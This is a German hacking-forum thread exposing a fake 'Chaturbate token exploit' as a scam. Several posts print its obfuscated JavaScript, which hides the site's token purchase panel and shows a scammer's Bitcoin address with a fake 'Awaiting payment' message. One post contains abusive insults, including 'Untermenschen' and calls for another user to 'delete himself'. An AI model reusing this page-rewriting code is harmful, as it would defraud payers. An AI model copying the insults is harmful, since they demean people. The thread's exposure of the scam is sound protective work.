Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Chaturbate Token Exploit

- - - - -

  • Bitte melde dich an um zu Antworten
12 Antworten in diesem Thema

#1
ServerRaider

ServerRaider

    †¢

  • Premium Member
  • Likes
    28
  • 40 Beiträge
  • 8 Bedankt
  • Windows

Das soll ein Negativbeispiel für Topics sein, die dazu beitragen andere User zu Scammen.

 

#SufferTheConsequences

 

 

PDF-Download: 

Please Login HERE or Register HERE to see this link!

FAKE Exploit-Download: 

Please Login HERE or Register HERE to see this link!

 

Please Login HERE or Register HERE to see this link!


Bearbeitet von ProHex, 02 January 2021 - 08:35 Uhr.

•


#2
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    211
  • 219 Beiträge
  • 183 Bedankt

Ich find ein bisschen bitter wie armseelig der Code dahinter ist.

var x57946 = '15gxtPmKYYbX5DSeozJpE2Q2W5fZJ6h7qf';
var x89432 = 'Awaiting payment...(0/3 Confirmations)';
var x784532 = document.getElementsByClassName('purchase_tokens_shell');
document.body.remove(x784532);
document.write('<p id ="para">' + x57946 + '</p>');
document.write('<p id ="para1">' + x89432 + '</p>');
document.getElementById('para').style.textAlign = 'center';
document.getElementById('para1').style.textAlign = 'center'


  • romiro, Silent0wn3r und ServerRaider gefällt das

Thanked by 1 Member:
Xenos88

#3
Xenos88

Xenos88

    Hacker

  • Premium Member
  • Likes
    67
  • 151 Beiträge
  • 184 Bedankt

Kann mir jemand einen Acc geben (der schon mit dem Exploit verwendet wurde) plz?

 

Die Nächte sind so einsam xD

 

LG



#4
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    955
  • 896 Beiträge
  • 1384 Bedankt
  • Spender
  • verifiziert

kann ein Mod bitte diesen Link in den ersten Post einfügen?

Please Login HERE or Register HERE to see this link!

Für Leute die PDFs nicht laden wollen sondern direkt Online lesen (exploits/payloads usw)

 

##EDIT, der sogenannte Exploit, ist schon ziemlich alt und des geht so schon seitdem die BTC accepten.

THX for Share, ich persönlich kann mit Chaturbate und den ganzen Online Pr0n dreck nichts Anfangen!


Bearbeitet von Ch!ller, 24 December 2020 - 13:59 Uhr.

Alle Angaben und Informationen dienen lediglich der Theorie!

#5
romiro

romiro

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    6
  • 18 Beiträge
  • 1 Bedankt

 

Ich find ein bisschen bitter wie armseelig der Code dahinter ist.

var x57946 = '15gxtPmKYYbX5DSeozJpE2Q2W5fZJ6h7qf';
var x89432 = 'Awaiting payment...(0/3 Confirmations)';
var x784532 = document.getElementsByClassName('purchase_tokens_shell');
document.body.remove(x784532);
document.write('<p id ="para">' + x57946 + '</p>');
document.write('<p id ="para1">' + x89432 + '</p>');
document.getElementById('para').style.textAlign = 'center';
document.getElementById('para1').style.textAlign = 'center'

Okay sorry Leute, nur damit wir uns richtig verstehen. Dieser ganze "Exploit" ist nur ein schwindel um paar coins zu rippen oder?



#6
Sandoz

Sandoz

    Moderator

  • Moderator
  • Likes
    99
  • 212 Beiträge
  • 80 Bedankt
  • Android, Android [root]
  • Windows, Linux

kann ein Mod bitte diesen Link in den ersten Post einfügen?

 

Done


  • Ch!ller gefällt das

No Fixed Location - always behind a proxy

sandoz@neko.im


#7
v0id

v0id

    Noob

  • Members
  • PIPPIP
  • Likes
    1
  • 3 Beiträge
  • 1 Bedankt

Ich merke schon, die alten Zeiten sind lange vorbei. Von den hier Anwesenden möchte wohl keiner verstehen dass dieser "Exploit" ein einfacher Scam ist. Das obfuscated JS klinkt ein paar statics in den DOM:

'use strict';
/** @Type_S {!Array} */
var _0x7fbd = ["15gxtPmKYYbX5DSeozJpE2Q2W5fZJ6h7qf", "Awaiting payment...(0/3 Confirmations)", "purchase_tokens_shell", "getElementsByClassName", "remove", "body", '<p id ="para">', "</p>", "write", '<p id ="para1">', "textAlign", "style", "para", "getElementById", "center", "para1"];
var x57946 = _0x7fbd[0];
var x89432 = _0x7fbd[1];
var x784532 = document[_0x7fbd[3]](_0x7fbd[2]);
document[_0x7fbd[5]][_0x7fbd[4]](x784532);
document[_0x7fbd[8]](_0x7fbd[6] + x57946 + _0x7fbd[7]);
document[_0x7fbd[8]](_0x7fbd[9] + x89432 + _0x7fbd[7]);
document[_0x7fbd[13]](_0x7fbd[12])[_0x7fbd[11]][_0x7fbd[10]] = _0x7fbd[14];
document[_0x7fbd[13]](_0x7fbd[15])[_0x7fbd[11]][_0x7fbd[10]] = _0x7fbd[14];

Sieht dann so aus:

15gxtPmKYYbX5DSeozJpE2Q2W5fZJ6h7qf

Awaiting payment...(0/3 Confirmations)

Wer seine BTC an die Adresse schickt wurde abgezockt:

 

Please Login HERE or Register HERE to see this link!

Please Login HERE or Register HERE to see this link!


 

Jetzt soll mir einer der hier doch anscheinend so "hellen Köpfe" erklären inwiefern die obige Adresse mit dem Bezahlsystem von CoinPayments korreliert und wie es zu einem "Unknown payment received" kommen soll ..

 

Das "Tutorial" gehört gelöscht.



#8
ServerRaider

ServerRaider

    †¢

  • Premium Member
  • Likes
    28
  • 40 Beiträge
  • 8 Bedankt
  • Windows

Hatte dieses Ding seit ewigkeiten schon auf dem Rechner, dachte es wäre was brauchbares.

Markiert es am besten als Negativbeispiel.

Nächste mal schau ich mir sowas genauer an bevor ich es poste.


•


#9
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    211
  • 219 Beiträge
  • 183 Bedankt

Ich merke schon, die alten Zeiten sind lange vorbei. Von den hier Anwesenden möchte wohl keiner verstehen dass dieser "Exploit" ein einfacher Scam ist. Das obfuscated JS klinkt ein paar statics in den DOM:

'use strict';
/** @[member='Type_S'] {!Array} */
var _0x7fbd = ["15gxtPmKYYbX5DSeozJpE2Q2W5fZJ6h7qf", "Awaiting payment...(0/3 Confirmations)", "purchase_tokens_shell", "getElementsByClassName", "remove", "body", '<p id ="para">', "</p>", "write", '<p id ="para1">', "textAlign", "style", "para", "getElementById", "center", "para1"];
var x57946 = _0x7fbd[0];
var x89432 = _0x7fbd[1];
var x784532 = document[_0x7fbd[3]](_0x7fbd[2]);
document[_0x7fbd[5]][_0x7fbd[4]](x784532);
document[_0x7fbd[8]](_0x7fbd[6] + x57946 + _0x7fbd[7]);
document[_0x7fbd[8]](_0x7fbd[9] + x89432 + _0x7fbd[7]);
document[_0x7fbd[13]](_0x7fbd[12])[_0x7fbd[11]][_0x7fbd[10]] = _0x7fbd[14];
document[_0x7fbd[13]](_0x7fbd[15])[_0x7fbd[11]][_0x7fbd[10]] = _0x7fbd[14];

Sieht dann so aus:

15gxtPmKYYbX5DSeozJpE2Q2W5fZJ6h7qf

Awaiting payment...(0/3 Confirmations)

Wer seine BTC an die Adresse schickt wurde abgezockt:

 

Please Login HERE or Register HERE to see this link!

Please Login HERE or Register HERE to see this link!


 

Jetzt soll mir einer der hier doch anscheinend so "hellen Köpfe" erklären inwiefern die obige Adresse mit dem Bezahlsystem von CoinPayments korreliert und wie es zu einem "Unknown payment received" kommen soll ..

 

Das "Tutorial" gehört gelöscht.

 

 

War das dann nicht offensichtlich nach meiner Antwort in der die originale Bitcoinwallet über JS ersetzt wird mit der im Code? Ist doch bisschen mehr als offensichtlich.



#10
Xenos88

Xenos88

    Hacker

  • Premium Member
  • Likes
    67
  • 151 Beiträge
  • 184 Bedankt

Jetzt wisst ihr warum ich sagte, "ob wer ein Account für mich hat". Damit man selber erst mal merkt was für ein "Blödsinn" man postet.

 

No front an dich Raider <3



#11
Sandoz

Sandoz

    Moderator

  • Moderator
  • Likes
    99
  • 212 Beiträge
  • 80 Bedankt
  • Android, Android [root]
  • Windows, Linux

Ja das Script wie soll ichs sagen,Ist echt S.....


No Fixed Location - always behind a proxy

sandoz@neko.im


#12
nox

nox

    Hurensohn

  • Members
  • PIPPIP
  • Likes
    20
  • 8 Beiträge
  • 58 Bedankt

Ich merke schon, die alten Zeiten sind lange vorbei. Von den hier Anwesenden möchte wohl keiner verstehen dass dieser "Exploit" ein einfacher Scam ist. Das obfuscated JS klinkt ein paar statics in den DOM:

'use strict';
/** @[member='Type_S'] {!Array} */
var _0x7fbd = ["15gxtPmKYYbX5DSeozJpE2Q2W5fZJ6h7qf", "Awaiting payment...(0/3 Confirmations)", "purchase_tokens_shell", "getElementsByClassName", "remove", "body", '<p id ="para">', "</p>", "write", '<p id ="para1">', "textAlign", "style", "para", "getElementById", "center", "para1"];
var x57946 = _0x7fbd[0];
var x89432 = _0x7fbd[1];
var x784532 = document[_0x7fbd[3]](_0x7fbd[2]);
document[_0x7fbd[5]][_0x7fbd[4]](x784532);
document[_0x7fbd[8]](_0x7fbd[6] + x57946 + _0x7fbd[7]);
document[_0x7fbd[8]](_0x7fbd[9] + x89432 + _0x7fbd[7]);
document[_0x7fbd[13]](_0x7fbd[12])[_0x7fbd[11]][_0x7fbd[10]] = _0x7fbd[14];
document[_0x7fbd[13]](_0x7fbd[15])[_0x7fbd[11]][_0x7fbd[10]] = _0x7fbd[14];

Sieht dann so aus:

15gxtPmKYYbX5DSeozJpE2Q2W5fZJ6h7qf

Awaiting payment...(0/3 Confirmations)

Wer seine BTC an die Adresse schickt wurde abgezockt:

 

Please Login HERE or Register HERE to see this link!

Please Login HERE or Register HERE to see this link!


 

Jetzt soll mir einer der hier doch anscheinend so "hellen Köpfe" erklären inwiefern die obige Adresse mit dem Bezahlsystem von CoinPayments korreliert und wie es zu einem "Unknown payment received" kommen soll ..

 

Das "Tutorial" gehört gelöscht.

Nicht nur das Tutorial sollte man löschen. Auch Ch!ller sollte sich löschen gehen. Er hat mal wieder bewiesen dass er einfach dumm wie ein Stück Brot ohne Hefe ist!

 

Zitat von ihm:
"

##EDIT, der sogenannte Exploit, ist schon ziemlich alt und des geht so schon seitdem die BTC accepten.

THX for Share, ich persönlich kann mit Chaturbate und den ganzen Online Pr0n dreck nichts Anfangen!"

Ch!ller du bist und bleibst eine Witzfigur. Du und der Methhead SecurityFlaw seid einfach nur Untermenschen. Löscht euch!



Thanked by 1 Member:
pi00

#13
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    211
  • 219 Beiträge
  • 183 Bedankt

So, da ich ja keine Rückmeldung von Paula bekomme, muss ich da wohl selbst Konsequenzen ziehen.

 

Jeder User hier ist grundsätzlich dafür verantwortlich was er postet. @ServerRaider, du bist damit gemeint. - Konsequenzen muss ich jetzt ziehen.

 

Der Umgangston wie hier andere User beleidigt und mies gemacht wird ist der den ein 11-Jähriger "Ghettogangboss" so anschlagen würde. @nox damit bist du gemeint. - Auch dafür ziehe ich Konsequenzen.

 

@Alle anderen - Ich werde den Startpost editieren damit da niemand drauf reinfällt - aber wenn doch: Lesen ist wohl nicht eure Stärke.

 

Generell gilt auf Toolbase:

Benehmt euch. Pflegt einen netten und hilfsbereiten Umgangston. Bringt andere User nicht in Gefahr mit euren Postings.


  • Ch!ller, B1nary und holz96 gefällt das

Thanked by 1 Member:
ologie


  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


Dieses Thema wurde von 8 Mitglied(ern) gelesen


    0x53A, kiwitone, PenguinCyborg, pwcca, release88, Saarlodri, ssdonn, tbs1yy1212
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.